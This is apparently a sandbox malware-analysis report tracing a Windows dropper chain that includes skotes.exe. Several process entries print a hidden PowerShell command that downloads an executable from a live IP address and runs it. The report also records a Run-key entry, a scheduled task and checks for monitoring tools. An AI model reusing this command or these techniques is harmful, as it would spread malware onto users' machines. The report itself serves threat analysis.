Source: 10DCQZI[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0xd497
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: real checksum: 0x31d37e should be: 0x3239b2
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: real checksum: 0x4ee1c8 should be: 0x4f61f5
Source: random[1].exe.15.dr | Static PE information: real checksum: 0x1ce1fd should be: 0xeaeac
Source: GIIIIJDHJE.exe.2.dr | Static PE information: real checksum: 0x31d37e should be: 0x3239b2
Source: skotes.exe.5.dr | Static PE information: real checksum: 0x31d37e should be: 0x3239b2
Source: am.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x21d41
Source: eXbhgU9[1].exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x9001
Source: 36ac23ea9d.exe.15.dr | Static PE information: real checksum: 0x1ce1fd should be: 0xeaeac
Source: eXbhgU9.exe.15.dr | Static PE information: real checksum: 0x0 should be: 0x9001
Source: 5EfYBe3nch.exe | Static PE information: section name:
Source: 5EfYBe3nch.exe | Static PE information: section name: .idata
Source: 5EfYBe3nch.exe | Static PE information: section name:
Source: 5EfYBe3nch.exe | Static PE information: section name: dalsczsh
Source: 5EfYBe3nch.exe | Static PE information: section name: bgqwnedu
Source: 5EfYBe3nch.exe | Static PE information: section name: .taggant
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: section name:
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: section name: .idata
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: section name: zrmackkh
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: section name: rcriyoua
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: section name: .taggant
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name:
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name: .idata
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name: tezivoqu
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name: tcaewlrx
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name: .taggant
Source: freebl3.dll.2.dr | Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr | Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr | Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr | Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr | Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr | Static PE information: section name: .didat
Source: nss3.dll.2.dr | Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr | Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr | Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr | Static PE information: section name: .00cfg
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name:
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name: .idata
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name: tezivoqu
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name: tcaewlrx
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name: .taggant
Source: random[1].exe.2.dr | Static PE information: section name:
Source: random[1].exe.2.dr | Static PE information: section name: .idata
Source: random[1].exe.2.dr | Static PE information: section name: tezivoqu
Source: random[1].exe.2.dr | Static PE information: section name: tcaewlrx
Source: random[1].exe.2.dr | Static PE information: section name: .taggant
Source: skotes.exe.5.dr | Static PE information: section name:
Source: skotes.exe.5.dr | Static PE information: section name: .idata
Source: skotes.exe.5.dr | Static PE information: section name: tezivoqu
Source: skotes.exe.5.dr | Static PE information: section name: tcaewlrx
Source: skotes.exe.5.dr | Static PE information: section name: .taggant
Source: am[1].exe.15.dr | Static PE information: section name: .code
Source: am.exe.15.dr | Static PE information: section name: .code
Source: random[1].exe.15.dr | Static PE information: section name:
Source: random[1].exe.15.dr | Static PE information: section name: .idata
Source: random[1].exe.15.dr | Static PE information: section name:
Source: random[1].exe.15.dr | Static PE information: section name: cywnalex
Source: random[1].exe.15.dr | Static PE information: section name: reoqekwb
Source: random[1].exe.15.dr | Static PE information: section name: .taggant
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name:
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name: .idata
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name:
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name: cywnalex
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name: reoqekwb
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name: .taggant
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name:
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name: .idata
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name:
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name: xuvnqsmj
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name: dkjxiybl
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name: .taggant
Source: iSHmPkn.exe.15.dr | Static PE information: section name:
Source: iSHmPkn.exe.15.dr | Static PE information: section name: .idata
Source: iSHmPkn.exe.15.dr | Static PE information: section name:
Source: iSHmPkn.exe.15.dr | Static PE information: section name: xuvnqsmj
Source: iSHmPkn.exe.15.dr | Static PE information: section name: dkjxiybl
Source: iSHmPkn.exe.15.dr | Static PE information: section name: .taggant
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name:
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name: .idata
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name: tezivoqu
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name: tcaewlrx
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Code function: 5_2_0049D91C push ecx; ret 5_2_0049D92F
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Code function: 5_2_00491359 push es; ret 5_2_0049135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00FBD91C push ecx; ret 6_2_00FBD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 7_2_00FBD91C push ecx; ret 7_2_00FBD92F
Source: 5EfYBe3nch.exe | Static PE information: section name: entropy: 7.98283360449281
Source: 5EfYBe3nch.exe | Static PE information: section name: dalsczsh entropy: 7.955197108012415
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name: entropy: 7.138645527976382
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name: entropy: 7.138645527976382
Source: random[1].exe.2.dr | Static PE information: section name: entropy: 7.138645527976382
Source: skotes.exe.5.dr | Static PE information: section name: entropy: 7.138645527976382
Source: random[1].exe.15.dr | Static PE information: section name: entropy: 7.9821098884645165
Source: random[1].exe.15.dr | Static PE information: section name: cywnalex entropy: 7.9201905208706345
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name: entropy: 7.9821098884645165
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name: cywnalex entropy: 7.9201905208706345
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name: entropy: 7.972643769197814
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name: xuvnqsmj entropy: 7.953228779013761
Source: iSHmPkn.exe.15.dr | Static PE information: section name: entropy: 7.972643769197814
Source: iSHmPkn.exe.15.dr | Static PE information: section name: xuvnqsmj entropy: 7.953228779013761
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name: entropy: 7.997518573935155
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name: entropy: 7.831462667091339
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name: entropy: 7.983042351633134
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name: entropy: 7.881268733146465
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name: .data entropy: 7.981738077290403
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name: entropy: 7.138645527976382

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\Documents\GIIIIJDHJE.exe
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1027368001\36ac23ea9d.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\Documents\GIIIIJDHJE.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | File created: C:\YQNZByFp\jyidkjkfhjawd.exe
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | File created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | File created: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1027060001\av3EZhq.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\nss3.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\rsn[1].exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1027024001\am.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\av3EZhq[1].exe
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\ProgramData\softokn3.dll

Boot Survival

                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Window searched: window name: FilemonClass
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Window searched: window name: RegmonClass
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Window searched: window name: Regmonclass
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Window searched: window name: Filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Window searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Window searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Window searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Window searched: window name: Filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Window searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Window searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exe | Window searched: window name: FilemonClass
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exe | Window searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | Window searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | Window searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | Window searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Window searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Window searched: window name: RegmonClass
                                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | File created: C:\Windows\Tasks\skotes.job
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am.cmd

                                      Hooking and other Techniques for Hiding and Protection

                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

                                      Malware Analysis System Evasion

                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
